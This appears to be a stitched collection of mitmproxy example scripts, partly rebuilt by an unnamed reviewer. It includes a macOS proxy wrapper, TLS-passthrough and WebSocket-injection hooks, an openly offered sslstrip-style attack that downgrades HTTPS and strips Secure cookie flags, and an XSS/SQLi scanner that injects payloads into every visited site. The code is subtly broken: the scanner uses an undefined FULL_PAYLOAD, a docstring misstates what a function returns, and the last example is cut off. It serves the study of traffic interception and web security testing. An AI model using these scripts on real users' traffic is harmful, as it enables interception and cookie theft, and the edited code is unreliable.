                self.enable_proxy_for_service(service_name)

    def connected_service_names(self):
        scutil_script = 'list\n'
        stdout = self.run_command_with_input('/usr/sbin/scutil', scutil_script)
        service_ids = re.findall(r'State:/Network/Service/(.+)/IPv4', stdout)

        service_names = []
        for service_id in service_ids:
            scutil_script = 'show Setup:/Network/Service/{}\n'.format(
                service_id)
            stdout = self.run_command_with_input(
                '/usr/sbin/scutil', scutil_script)
            service_name, = re.findall(r'UserDefinedName\s*:\s*(.+)', stdout)
            service_names.append(service_name)

        return service_names

    def wrap_mitmproxy(self):
        with self.wrap_proxy():
            cmd = ['mitmproxy', '-p', str(self.port)]
            if self.extra_arguments:
                cmd.extend(self.extra_arguments)
            subprocess.check_call(cmd)

    def wrap_honeyproxy(self):
        with self.wrap_proxy():
            popen = subprocess.Popen('honeyproxy.sh')
            try:
                popen.wait()
            except KeyboardInterrupt:
                popen.terminate()

    @contextlib.contextmanager
    def wrap_proxy(self):
        """Enable the system proxy for the duration of the with-block."""
        connected_service_names = self.connected_service_names()
        for service_name in connected_service_names:
            if not self.proxy_enabled_for_service(service_name):
                self.enable_proxy_for_service(service_name)

        yield

        for service_name in connected_service_names:
            if self.proxy_enabled_for_service(service_name):
                self.disable_proxy_for_service(service_name)

    @classmethod
    def ensure_superuser(cls):
        if os.getuid() != 0:
            print('Relaunching with sudo...')
            os.execv('/usr/bin/sudo', ['/usr/bin/sudo'] + sys.argv)

    @classmethod
    def main(cls):
        parser = argparse.ArgumentParser(
            description='Helper tool for OS X proxy configuration and mitmproxy.',
            epilog='Any additional arguments will be passed on unchanged to mitmproxy.')
        parser.add_argument('-t', '--toggle', action='store_true',
                            help='just toggle the proxy configuration')
        # parser.add_argument('--honeyproxy', action='store_true', help='run honeyproxy instead of mitmproxy')
        parser.add_argument('-p', '--port', type=int, default=8080,
                            help='override the default port of 8080',)
        args, extra_arguments = parser.parse_known_args()

        wrapper = cls(port=args.port, extra_arguments=extra_arguments)

        if args.toggle:
            wrapper.toggle_proxy()
        # elif args.honeyproxy:
        #     wrapper.wrap_honeyproxy()
        else:
            wrapper.wrap_mitmproxy()

if __name__ == '__main__':
    # Relaunch under sudo if necessary, then parse args and run.
    # (the guard body was lost in extraction; restored from upstream)
    Wrapper.ensure_superuser()
    Wrapper.main()

#  Example: complex/nonblocking.py

import time

from mitmproxy.script import concurrent

@concurrent  # Remove this and see what happens
def request(flow):
    # This is ugly in mitmproxy's UI, but you don't want to use mitmproxy.ctx.log from a different thread.
    print("handle request: %s%s" % (flow.request.host, flow.request.path))
    # NOTE(review): the sleep was lost in extraction (`import time` is
    # otherwise unused); the whole point of the example is a slow handler
    # that @concurrent keeps from blocking the proxy. Upstream uses sleep(5).
    time.sleep(5)
    print("start  request: %s%s" % (flow.request.host, flow.request.path))

#  Example: complex/remote_debug.py

This script enables remote debugging of the mitmproxy *UI* with PyCharm.
For general debugging purposes, it is easier to just debug mitmdump within PyCharm.

    - pip install pydevd on the mitmproxy machine
    - Open the Run/Debug Configuration dialog box in PyCharm, and select the
      Python Remote Debug configuration type.
    - Debugging works in the way that mitmproxy connects to the debug server
      on startup. Specify host and port that mitmproxy can use to reach your
      PyCharm instance on startup.
    - Adjust this inline script accordingly.
    - Start debug server in PyCharm
    - Set breakpoints
    - Start mitmproxy -s remote_debug.py

def load(l):
    """mitmproxy `load` hook: connect to a PyCharm remote-debug server.

    The import is deferred so pydevd_pycharm is only required when this
    script is actually loaded.
    """
    import pydevd_pycharm
    # Host/port must match the Python Remote Debug configuration in PyCharm.
    pydevd_pycharm.settrace("localhost", port=5678, stdoutToServer=True, stderrToServer=True, suspend=False)

#  Example: complex/sslstrip.py

This script implements an sslstrip-like attack based on mitmproxy.
import re
import urllib.parse
import typing  # noqa

from mitmproxy import http

# set of SSL/TLS capable hosts
secure_hosts: typing.Set[str] = set()

def request(flow: http.HTTPFlow) -> None:
    """Strip cache validators and HTTPS-upgrade hints; re-route known-TLS hosts."""
    # Remove cache validators and the https-redirect hint so the server
    # sends a full, downgradable response.
    for name in ('If-Modified-Since', 'Cache-Control', 'Upgrade-Insecure-Requests'):
        flow.request.headers.pop(name, None)

    # Hosts previously observed redirecting to TLS get proxied over HTTPS.
    if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443

        # We need to update the request destination to whatever is specified in the host header:
        # Having no TLS Server Name Indication from the client and just an IP address as request.host
        # in transparent mode, TLS server name certificate validation would fail.
        flow.request.host = flow.request.pretty_host

def response(flow: http.HTTPFlow) -> None:
    """Downgrade security signals in the response so the client stays on HTTP.

    NOTE(review): the `secure_hosts.add(hostname)` line inside the
    Location-header branch was dropped by extraction (leaving a dangling
    `if hostname:`); restored per the upstream sslstrip example.
    """
    assert flow.response
    flow.response.headers.pop('Strict-Transport-Security', None)
    flow.response.headers.pop('Public-Key-Pins', None)

    # strip links in response body
    flow.response.content = flow.response.content.replace(b'https://', b'http://')

    # strip meta tag upgrade-insecure-requests in response body
    csp_meta_tag_pattern = br'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
    flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)

    # strip links in 'Location' header
    if flow.response.headers.get('Location', '').startswith('https://'):
        location = flow.response.headers['Location']
        hostname = urllib.parse.urlparse(location).hostname
        if hostname:
            # remember this host as TLS-capable so request() re-upgrades it
            secure_hosts.add(hostname)
        flow.response.headers['Location'] = location.replace('https://', 'http://', 1)

    # strip upgrade-insecure-requests in Content-Security-Policy header
    csp_header = flow.response.headers.get('Content-Security-Policy', '')
    if re.search('upgrade-insecure-requests', csp_header, flags=re.IGNORECASE):
        csp = flow.response.headers['Content-Security-Policy']
        new_header = re.sub(r'upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)
        flow.response.headers['Content-Security-Policy'] = new_header

    # strip secure flag from 'Set-Cookie' headers
    cookies = flow.response.headers.get_all('Set-Cookie')
    cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
    flow.response.headers.set_all('Set-Cookie', cookies)

#  Example: complex/stream.py

def responseheaders(flow):
    """Enable streaming for all responses.

    This is equivalent to passing `--set stream_large_bodies=1` to mitmproxy.
    (The docstring quotes were lost in extraction, which made this a
    SyntaxError; restored.)
    """
    flow.response.stream = True

#  Example: complex/stream_modify.py

This inline script modifies a streamed response.
If you do not need streaming, see the modify_response_body example.
Be aware that content replacement isn't trivial:
    - If the transfer encoding isn't chunked, you cannot simply change the content length.
    - If you want to replace all occurrences of "foobar", make sure to catch the cases
      where one chunk ends with [...]foo" and the next starts with "bar[...].

def modify(chunks):
    """Yield each streamed chunk with "foo" replaced by "bar".

    `chunks` is a generator that can be used to iterate over all chunks.
    Note: a "foo" split across two chunks is not caught (see the caveat
    in the header above). The docstring quotes were lost in extraction,
    which made this a SyntaxError; restored.
    """
    for chunk in chunks:
        yield chunk.replace("foo", "bar")

def responseheaders(flow):
    """Stream the response body through the `modify` chunk filter above."""
    flow.response.stream = modify

#  Example: complex/tcp_message.py

tcp_message Inline Script Hook API Demonstration

* modifies packets containing "foo" to "bar"
* prints various details for each packet.

example cmdline invocation:
mitmdump --rawtcp --tcp-host ".*" -s examples/complex/tcp_message.py
from mitmproxy.utils import strutils
from mitmproxy import ctx
from mitmproxy import tcp

def tcp_message(flow: tcp.TCPFlow):
    """Rewrite b"foo" -> b"bar" in the newest TCP message and log its details.

    NOTE(review): reconstructed — extraction dropped the ctx.log.info(...)
    call wrapping the format() expression and its final argument; restored
    per the upstream tcp_message example.
    """
    message = flow.messages[-1]
    old_content = message.content
    message.content = old_content.replace(b"foo", b"bar")

    ctx.log.info(
        "[tcp_message{}] from {} to {}:\n{}".format(
            " (modified)" if message.content != old_content else "",
            "client" if message.from_client else "server",
            "server" if message.from_client else "client",
            strutils.bytes_to_escaped_str(message.content),
        )
    )

#  Example: complex/tls_passthrough.py

This inline script allows conditional TLS Interception based
on a user-defined strategy.


    > mitmdump -s tls_passthrough.py

    1. curl --proxy http://localhost:8080 https://example.com --insecure
    // works - we'll also see the contents in mitmproxy

    2. curl --proxy http://localhost:8080 https://example.com --insecure
    // still works - we'll also see the contents in mitmproxy

    3. curl --proxy http://localhost:8080 https://example.com
    // fails with a certificate error, which we will also see in mitmproxy

    4. curl --proxy http://localhost:8080 https://example.com
    // works again, but mitmproxy does not intercept and we do *not* see the contents

Authors: Maximilian Hils, Matthew Tuusberg
import collections
import random

from enum import Enum

import mitmproxy
from mitmproxy import ctx
from mitmproxy.exceptions import TlsProtocolException
from mitmproxy.proxy.protocol import TlsLayer, RawTCPLayer

class InterceptionResult(Enum):
    """Tri-state outcome of a TLS interception attempt against one server."""
    success = True
    failure = False
    skipped = None

class _TlsStrategy:
    """Abstract base class for interception strategies.

    Tracks recent per-server interception outcomes so subclasses can
    decide whether to intercept future connections.
    NOTE(review): the record_* method bodies were dropped by extraction;
    restored per the upstream tls_passthrough example.
    """

    def __init__(self):
        # A server_address -> interception results mapping
        self.history = collections.defaultdict(lambda: collections.deque(maxlen=200))

    def should_intercept(self, server_address):
        """Return True to attempt interception, False for pass-through."""
        raise NotImplementedError()

    def record_success(self, server_address):
        self.history[server_address].append(InterceptionResult.success)

    def record_failure(self, server_address):
        self.history[server_address].append(InterceptionResult.failure)

    def record_skipped(self, server_address):
        self.history[server_address].append(InterceptionResult.skipped)

class ConservativeStrategy(_TlsStrategy):
    """Conservative Interception Strategy - only intercept if there haven't
    been any failed attempts in the history.

    (The docstring quotes were lost in extraction, which made this a
    SyntaxError; restored.)
    """

    def should_intercept(self, server_address):
        # Any recorded failure (e.g. cert pinning) disables interception for this host.
        if InterceptionResult.failure in self.history[server_address]:
            return False
        return True

class ProbabilisticStrategy(_TlsStrategy):
    """Fixed probability that we intercept a given connection.

    (The docstring quotes were lost in extraction, which made this a
    SyntaxError; restored.)
    """

    def __init__(self, p):
        # p: interception probability in [0, 1]
        self.p = p
        super(ProbabilisticStrategy, self).__init__()

    def should_intercept(self, server_address):
        return random.uniform(0, 1) < self.p

class TlsFeedback(TlsLayer):
    """Monkey-patch _establish_tls_with_client to get feedback if TLS could be
    established successfully on the client connection (which may fail due to
    cert pinning).

    NOTE(review): the `try:` line and the tls_strategy.record_* calls were
    dropped by extraction; restored per the upstream example.
    """

    def _establish_tls_with_client(self):
        server_address = self.server_conn.address
        try:
            super(TlsFeedback, self)._establish_tls_with_client()
        except TlsProtocolException as e:
            # Client rejected our certificate (e.g. pinning) - remember and re-raise.
            tls_strategy.record_failure(server_address)
            raise e
        else:
            tls_strategy.record_success(server_address)

# inline script hooks below.

tls_strategy = None

def load(l):
    """mitmproxy `load` hook: register the passthrough-probability option.

    NOTE(review): the `l.add_option(` opener was dropped by extraction,
    leaving an orphaned argument line; restored.
    """
    l.add_option(
        "tlsstrat", int, 0, "TLS passthrough strategy (0-100)",
    )

def configure(updated):
    """Select the interception strategy from the `tlsstrat` option.

    NOTE(review): the `else:` line was dropped by extraction — as written,
    the ConservativeStrategy assignment unconditionally overwrote the
    probabilistic one inside the if-branch; restored.
    """
    global tls_strategy
    if ctx.options.tlsstrat > 0:
        # tlsstrat is a percentage; convert to a probability.
        tls_strategy = ProbabilisticStrategy(float(ctx.options.tlsstrat) / 100.0)
    else:
        tls_strategy = ConservativeStrategy()

def next_layer(next_layer):
    """If the next layer is planned to be TLS, optionally swap in pass-through.

    NOTE(review): reconstructed — the docstring quotes, the `else:` line,
    the record_skipped call and the final reply.send(...) were dropped by
    extraction; restored per the upstream example.
    """
    if isinstance(next_layer, TlsLayer) and next_layer._client_tls:
        server_address = next_layer.server_conn.address

        if tls_strategy.should_intercept(server_address):
            # We try to intercept.
            # Monkey-Patch the layer to get feedback from the TLSLayer if interception worked.
            next_layer.__class__ = TlsFeedback
        else:
            # We don't intercept - reply with a pass-through layer and add a "skipped" entry.
            tls_strategy.record_skipped(server_address)
            mitmproxy.ctx.log("TLS passthrough for %s" % repr(next_layer.server_conn.address), "info")
            next_layer_replacement = RawTCPLayer(next_layer.ctx, ignore=True)
            next_layer.reply.send(next_layer_replacement)

#  Example: complex/websocket_inject_message.py

This example shows how to inject a WebSocket message to the client.
Every new WebSocket connection will trigger a new asyncio task that
periodically injects a new message to the client.
import asyncio
import mitmproxy.websocket

class InjectWebSocketMessage:
    """Inject a message to the client every five seconds per WebSocket flow."""

    async def inject(self, flow: mitmproxy.websocket.WebSocketFlow):
        # Keep injecting until the flow ends or errors out.
        i = 0
        while not flow.ended and not flow.error:
            await asyncio.sleep(5)
            flow.inject_message(flow.client_conn, 'This is the #{} injected message!'.format(i))
            i += 1

    def websocket_start(self, flow):
        # NOTE(review): body reconstructed - dropped by extraction.
        # Schedule the injector task on mitmproxy's running event loop.
        asyncio.get_event_loop().create_task(self.inject(flow))

addons = [InjectWebSocketMessage()]

#  Example: complex/xss_scanner.py


 __   __ _____ _____     _____
 \ \ / // ____/ ____|   / ____|
  \ V /| (___| (___    | (___   ___ __ _ _ __  _ __   ___ _ __
   > <  \___ \\___ \    \___ \ / __/ _` | '_ \| '_ \ / _ \ '__|
  / . \ ____) |___) |   ____) | (_| (_| | | | | | | |  __/ |
 /_/ \_\_____/_____/   |_____/ \___\__,_|_| |_|_| |_|\___|_|

This script automatically scans all visited webpages for XSS and SQLi vulnerabilities.

Usage: mitmproxy -s xss_scanner.py

This script scans for vulnerabilities by injecting a fuzzing payload (see PAYLOAD below) into 4 different places
and examining the HTML to look for XSS and SQLi injection vulnerabilities. The XSS scanning functionality works by
looking to see whether it is possible to inject HTML based off of where the payload appears in the page and what
characters are escaped. In addition, it also looks for any script tags that load javascript from unclaimed domains.
The SQLi scanning functionality works by using regular expressions to look for errors from a number of different
common databases. Since it is only looking for errors, it will not find blind SQLi vulnerabilities.

The 4 places it injects the payload into are:
1. URLs         (e.g. https://example.com/ -> https://example.com/PAYLOAD/)
2. Queries      (e.g. https://example.com/index.html?a=b -> https://example.com/index.html?a=PAYLOAD)
3. Referers     (e.g. The referer changes from https://example.com to PAYLOAD)
4. User Agents  (e.g. The UA changes from Chrome to PAYLOAD)

Reports from this script show up in the event log (viewable by pressing e) and formatted like:

===== XSS Found ====
XSS URL: http://daviddworken.com/vulnerableUA.php
Injection Point: User Agent
Suggested Exploit: <script>alert(0)</script>
Line: 1029zxcs'd"ao<ac>so[sb]po(pc)se;sl/bsl\eq=3847asd


from html.parser import HTMLParser
from typing import Dict, Union, Tuple, Optional, List, NamedTuple
from urllib.parse import urlparse
import re
import socket

import requests

from mitmproxy import http
from mitmproxy import ctx

# The actual payload is put between a frontWall and a backWall to make it easy
# to locate the payload with regular expressions
FRONT_WALL = b"1029zxc"
BACK_WALL = b"3847asd"
PAYLOAD = b"""s'd"ao<ac>so[sb]po(pc)se;sl/bsl\\eq="""

# A XSSData is a named tuple with the following fields:
#   - url -> str
#   - injection_point -> str
#   - exploit -> str
#   - line -> str
XSSData = NamedTuple('XSSData', [('url', str),
                                 ('injection_point', str),
                                 ('exploit', str),
                                 ('line', str)])

# A SQLiData is named tuple with the following fields:
#   - url -> str
#   - injection_point -> str
#   - regex -> str
#   - dbms -> str
SQLiData = NamedTuple('SQLiData', [('url', str),
                                   ('injection_point', str),
                                   ('regex', str),
                                   ('dbms', str)])

VulnData = Tuple[Optional[XSSData], Optional[SQLiData]]
Cookies = Dict[str, str]

def get_cookies(flow: http.HTTPFlow) -> Cookies:
    """Map cookie names to cookie values for the given flow.

    Includes both the cookies sent in the original request and the
    cookies sent by the server.
    """
    return dict(flow.request.cookies.fields)

def find_unclaimed_URLs(body, requestUrl):
    """Look for unclaimed script/iframe/stylesheet URLs and log them if found.

    NOTE(review): reconstructed — `parser.feed(body)` and the DNS-lookup
    `try:` block were dropped by extraction; restored per the upstream
    example. Also made `script_URLs` an instance attribute: as a class
    attribute the list was shared and leaked across calls.
    """
    def getValue(attrs: List[Tuple[str, str]], attrName: str) -> Optional[str]:
        for name, value in attrs:
            if attrName == name:
                return value
        return None

    class ScriptURLExtractor(HTMLParser):
        def __init__(self):
            super().__init__()
            self.script_URLs: List[str] = []

        def handle_starttag(self, tag, attrs):
            if (tag == "script" or tag == "iframe") and "src" in [name for name, value in attrs]:
                self.script_URLs.append(getValue(attrs, "src"))
            if tag == "link" and getValue(attrs, "rel") == "stylesheet" and "href" in [name for name, value in attrs]:
                self.script_URLs.append(getValue(attrs, "href"))

    parser = ScriptURLExtractor()
    parser.feed(body)
    for url in parser.script_URLs:
        url_parser = urlparse(url)
        domain = url_parser.netloc
        try:
            # If the domain does not resolve, an attacker could claim it.
            socket.gethostbyname(domain)
        except socket.gaierror:
            ctx.log.error(f"XSS found in {requestUrl} due to unclaimed URL \"{url}\".")

def test_end_of_URL_injection(original_body: str, request_URL: str, cookies: Cookies) -> VulnData:
    """Inject the payload as the final URL path segment and scan the result
    for XSS and SQLi, returning (xss_info, sqli_info)."""
    parsed_URL = urlparse(request_URL)
    # The payload becomes its own path segment, so a non-empty path must end in "/".
    path = parsed_URL.path
    if path != "" and not path.endswith("/"):
        path += "/"
    path += FULL_PAYLOAD.decode('utf-8')  # the path must be a string while the payload is bytes
    url = parsed_URL._replace(path=path).geturl()
    body = requests.get(url, cookies=cookies).text.lower()
    return (
        get_XSS_data(body, url, "End of URL"),
        get_SQLi_data(body, original_body, url, "End of URL"),
    )

def test_referer_injection(original_body: str, request_URL: str, cookies: Cookies) -> VulnData:
    """Inject the payload via the Referer header and scan the result for
    XSS and SQLi, returning (xss_info, sqli_info)."""
    injected_headers = {'referer': FULL_PAYLOAD}
    body = requests.get(request_URL, headers=injected_headers, cookies=cookies).text.lower()
    return (
        get_XSS_data(body, request_URL, "Referer"),
        get_SQLi_data(body, original_body, request_URL, "Referer"),
    )

def test_user_agent_injection(original_body: str, request_URL: str, cookies: Cookies) -> VulnData:
    """Inject the payload via the User-Agent header and scan the result for
    XSS and SQLi, returning (xss_info, sqli_info)."""
    injected_headers = {'User-Agent': FULL_PAYLOAD}
    body = requests.get(request_URL, headers=injected_headers, cookies=cookies).text.lower()
    return (
        get_XSS_data(body, request_URL, "User Agent"),
        get_SQLi_data(body, original_body, request_URL, "User Agent"),
    )

def test_query_injection(original_body: str, request_URL: str, cookies: Cookies):
    """Replace every query parameter's value with the payload and scan the
    result for XSS and SQLi, returning (xss_info, sqli_info)."""
    parsed_URL = urlparse(request_URL)
    payload_str = FULL_PAYLOAD.decode('utf-8')
    # Keep each parameter name; substitute its value with the payload.
    injected = [part.split("=")[0] + "=" + payload_str for part in parsed_URL.query.split("&")]
    new_URL = parsed_URL._replace(query="&".join(injected)).geturl()
    body = requests.get(new_URL, cookies=cookies).text.lower()
    return (
        get_XSS_data(body, new_URL, "Query"),
        get_SQLi_data(body, original_body, new_URL, "Query"),
    )

def log_XSS_data(xss_info: Optional[XSSData]) -> None:
    """Log information about the given XSS to mitmproxy.

    NOTE(review): the `return` after the None-guard was dropped by
    extraction (dangling `if`); restored.
    """
    # If it is None, then there is no info to log
    if not xss_info:
        return
    ctx.log.error("===== XSS Found ====")
    ctx.log.error("XSS URL: %s" % xss_info.url)
    ctx.log.error("Injection Point: %s" % xss_info.injection_point)
    ctx.log.error("Suggested Exploit: %s" % xss_info.exploit)
    ctx.log.error("Line: %s" % xss_info.line)

def log_SQLi_data(sqli_info: Optional[SQLiData]) -> None:
    """Log information about the given SQLi to mitmproxy.

    NOTE(review): the `return` after the None-guard was dropped by
    extraction (dangling `if`); restored.
    """
    if not sqli_info:
        return
    ctx.log.error("===== SQLi Found =====")
    ctx.log.error("SQLi URL: %s" % sqli_info.url)
    ctx.log.error("Injection Point: %s" % sqli_info.injection_point)
    ctx.log.error("Regex used: %s" % sqli_info.regex)
    ctx.log.error("Suspected DBMS: %s" % sqli_info.dbms)

def get_SQLi_data(new_body: str, original_body: str, request_URL: str, injection_point: str) -> Optional[SQLiData]:
    """Return a SQLiData if the injected response contains a database error
    that the original response did not; otherwise return None.

    NOTE(review): the `DBMS_ERRORS = {` opener/closer and the SQLiData
    argument list were dropped by extraction; restored per the upstream
    example.
    """
    # Regexes taken from Damn Small SQLi Scanner: https://github.com/stamparm/DSSS/blob/master/dsss.py#L17
    DBMS_ERRORS = {
        "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
        "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
        "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver",
                                 r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}",
                                 r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
        "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
        "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
        "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
        "SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*",
                   r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
        "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
    }
    for dbms, regexes in DBMS_ERRORS.items():
        for regex in regexes:  # type: ignore
            if re.search(regex, new_body, re.IGNORECASE) and not re.search(regex, original_body, re.IGNORECASE):
                return SQLiData(request_URL,
                                injection_point,
                                regex,
                                dbms)
    return None

# A qc is either ' or "
def inside_quote(qc: str, substring_bytes: bytes, text_index: int, body_bytes: bytes) -> bool:
    """Whether the text_index-th occurrence of `substring_bytes` within
    `body_bytes` appears inside quotes of the kind given by `qc`.

    NOTE(review): the closing parentheses of the two multi-line boolean
    expressions below were dropped by extraction (SyntaxError); restored.
    """
    substring = substring_bytes.decode('utf-8')
    body = body_bytes.decode('utf-8')
    num_substrings_found = 0
    in_quote = False
    for index, char in enumerate(body):
        # Whether the next chunk of len(substring) chars is the substring
        next_part_is_substring = (
            (not (index + len(substring) > len(body))) and
            (body[index:index + len(substring)] == substring)
        )
        # Whether this char is escaped with a \
        is_not_escaped = (
            (index - 1 < 0 or index - 1 > len(body)) or
            (body[index - 1] != "\\")
        )
        if char == qc and is_not_escaped:
            in_quote = not in_quote
        if next_part_is_substring:
            if num_substrings_found == text_index:
                return in_quote
            num_substrings_found += 1
    return False

def paths_to_text(html: str, string: str) -> List[str]:
    """Return the list of tag paths (e.g. "/html/body/p") at which `string`
    occurs as data in the given HTML, in document order.

    NOTE(review): reconstructed — the inner docstring's closing quotes, the
    handle_data append, and the `parser.feed(html)` call were dropped by
    extraction; restored. Also moved `currentPath`/`paths` to instance
    attributes: as class attributes the list was shared and accumulated
    results across successive calls.
    """
    def remove_last_occurence_of_sub_string(string: str, substr: str) -> str:
        """Delete the last occurrence of substr from string."""
        index = string.rfind(substr)
        return string[:index] + string[index + len(substr):]

    class PathHTMLParser(HTMLParser):
        def __init__(self):
            super().__init__()
            self.currentPath = ""
            self.paths: List[str] = []

        def handle_starttag(self, tag, attrs):
            self.currentPath += ("/" + tag)

        def handle_endtag(self, tag):
            self.currentPath = remove_last_occurence_of_sub_string(self.currentPath, "/" + tag)

        def handle_data(self, data):
            if string in data:
                self.paths.append(self.currentPath)

    parser = PathHTMLParser()
    parser.feed(html)
    return parser.paths

def get_XSS_data(body: Union[str, bytes], request_URL: str, injection_point: str) -> Optional[XSSData]:
    """Return a XSSData if there is a XSS otherwise return None.

    NOTE(review): reconstructed — the `try:` lines in the helpers, the
    `parser.feed(html)` call and the XSSData(...) argument lists were
    dropped by extraction; restored per the upstream xss_scanner example.
    """
    def in_script(text, index, body) -> bool:
        """Whether the Numberth occurrence of the first string in the second
        string is inside a script tag."""
        paths = paths_to_text(body.decode('utf-8'), text.decode("utf-8"))
        try:
            path = paths[index]
            return "script" in path
        except IndexError:
            return False

    def in_HTML(text: bytes, index: int, body: bytes) -> bool:
        """Whether the Numberth occurrence of the first string in the second
        string is inside the HTML but not inside a script tag or part of
        a HTML attribute."""
        # if there is a < then lxml will interpret that as a tag, so only search for the stuff before it
        text = text.split(b"<")[0]
        paths = paths_to_text(body.decode('utf-8'), text.decode("utf-8"))
        try:
            path = paths[index]
            return "script" not in path
        except IndexError:
            return False

    def inject_javascript_handler(html: str) -> bool:
        """Whether you can inject a Javascript:alert(0) as a link."""
        class injectJSHandlerHTMLParser(HTMLParser):
            injectJSHandler = False

            def handle_starttag(self, tag, attrs):
                for name, value in attrs:
                    if name == "href" and value.startswith(FRONT_WALL.decode('utf-8')):
                        self.injectJSHandler = True

        parser = injectJSHandlerHTMLParser()
        parser.feed(html)
        return parser.injectJSHandler

    # Only convert the body to bytes if needed
    if isinstance(body, str):
        body = bytes(body, 'utf-8')
    # Regex for between 24 and 72 (aka 24*3) characters encapsulated by the walls
    regex = re.compile(b"""%s.{24,72}?%s""" % (FRONT_WALL, BACK_WALL))
    matches = regex.findall(body)
    for index, match in enumerate(matches):
        # Where the string is injected into the HTML
        in_script_val = in_script(match, index, body)
        in_HTML_val = in_HTML(match, index, body)
        in_tag = not in_script_val and not in_HTML_val
        in_single_quotes = inside_quote("'", match, index, body)
        in_double_quotes = inside_quote('"', match, index, body)
        # Whether you can inject:
        inject_open_angle = b"ao<ac" in match  # open angle brackets
        inject_close_angle = b"ac>so" in match  # close angle brackets
        inject_single_quotes = b"s'd" in match  # single quotes
        inject_double_quotes = b'd"ao' in match  # double quotes
        inject_slash = b"sl/bsl" in match  # forward slashes
        inject_semi = b"se;sl" in match  # semicolons
        inject_equals = b"eq=" in match  # equals sign
        if in_script_val and inject_slash and inject_open_angle and inject_close_angle:  # e.g. <script>PAYLOAD</script>
            return XSSData(request_URL,
                           injection_point,
                           '</script><script>alert(0)</script><script>',
                           match.decode('utf-8'))
        elif in_script_val and in_single_quotes and inject_single_quotes and inject_semi:  # e.g. <script>t='PAYLOAD';</script>
            return XSSData(request_URL,
                           injection_point,
                           "';alert(0);'",
                           match.decode('utf-8'))
        elif in_script_val and in_double_quotes and inject_double_quotes and inject_semi:  # e.g. <script>t="PAYLOAD";</script>
            return XSSData(request_URL,
                           injection_point,
                           '";alert(0);"',
                           match.decode('utf-8'))
        elif in_tag and in_single_quotes and inject_single_quotes and inject_open_angle and inject_close_angle and inject_slash:
            # e.g. <a href='PAYLOAD'>Test</a>
            return XSSData(request_URL,
                           injection_point,
                           "'><script>alert(0)</script>",
                           match.decode('utf-8'))
        elif in_tag and in_double_quotes and inject_double_quotes and inject_open_angle and inject_close_angle and inject_slash:
            # e.g. <a href="PAYLOAD">Test</a>
            return XSSData(request_URL,
                           injection_point,
                           '"><script>alert(0)</script>',
                           match.decode('utf-8'))
        elif in_tag and not in_double_quotes and not in_single_quotes and inject_open_angle and inject_close_angle and inject_slash:
            # e.g. <a href=PAYLOAD>Test</a>
            return XSSData(request_URL,
                           injection_point,
                           '><script>alert(0)</script>',
                           match.decode('utf-8'))
        elif inject_javascript_handler(body.decode('utf-8')):  # e.g. <html><a href=PAYLOAD>Test</a>
            return XSSData(request_URL,
                           injection_point,
                           'Javascript:alert(0)',
                           match.decode('utf-8'))
        elif in_tag and in_double_quotes and inject_double_quotes and inject_equals:  # e.g. <a href="PAYLOAD">Test</a>
            return XSSData(request_URL,
                           injection_point,
                           '" onmouseover="alert(0)" t="',
                           match.decode('utf-8'))
        elif in_tag and in_single_quotes and inject_single_quotes and inject_equals:  # e.g. <a href='PAYLOAD'>Test</a>
            return XSSData(request_URL,
                           injection_point,
                           "' onmouseover='alert(0)' t='",
                           match.decode('utf-8'))
        elif in_tag and not in_single_quotes and not in_double_quotes and inject_equals:  # e.g. <a href=PAYLOAD>Test</a>
            return XSSData(request_URL,
                           injection_point,
                           " onmouseover=alert(0) t=",
                           match.decode('utf-8'))
        elif in_HTML_val and not in_script_val and inject_open_angle and inject_close_angle and inject_slash:  # e.g. <html>PAYLOAD</html>
            return XSSData(request_URL,
                           injection_point,
                           '<script>alert(0)</script>',
                           match.decode('utf-8'))
        else:
            return None
    return None

# response is mitmproxy's entry point
def response(flow: http.HTTPFlow) -> None:
    """mitmproxy entry point: scan each HTTP response for XSS and SQLi.

    NOTE(review): reconstructed — the log_XSS_data/log_SQLi_data calls
    after each test were dropped by extraction (`results` was assigned
    and never used); restored per the upstream example.
    """
    assert flow.response
    cookies_dict = get_cookies(flow)
    resp = flow.response.get_text(strict=False)
    assert resp
    # Example: http://xss.guru/unclaimedScriptTag.html
    find_unclaimed_URLs(resp, flow.request.url)
    results = test_end_of_URL_injection(resp, flow.request.url, cookies_dict)
    log_XSS_data(results[0])
    log_SQLi_data(results[1])
    # Example: https://daviddworken.com/vulnerableReferer.php
    results = test_referer_injection(resp, flow.request.url, cookies_dict)
    log_XSS_data(results[0])
    log_SQLi_data(results[1])
    # Example: https://daviddworken.com/vulnerableUA.php
    results = test_user_agent_injection(resp, flow.request.url, cookies_dict)
    log_XSS_data(results[0])
    log_SQLi_data(results[1])
    if "?" in flow.request.url:
        # Example: https://daviddworken.com/vulnerable.php?name=
        results = test_query_injection(resp, flow.request.url, cookies_dict)
        log_XSS_data(results[0])
        log_SQLi_data(results[1])

#  pathod

#  Example: pathod/libpathod_pathoc.py

#!/usr/bin/env python
from pathod import pathoc

# Open a pathoc client pointed at google.com:80.
# NOTE(review): truncated — the upstream example continues with
# p.connect() and p.request(...) calls that were dropped by extraction.
p = pathoc.Pathoc(("google.com", 80))
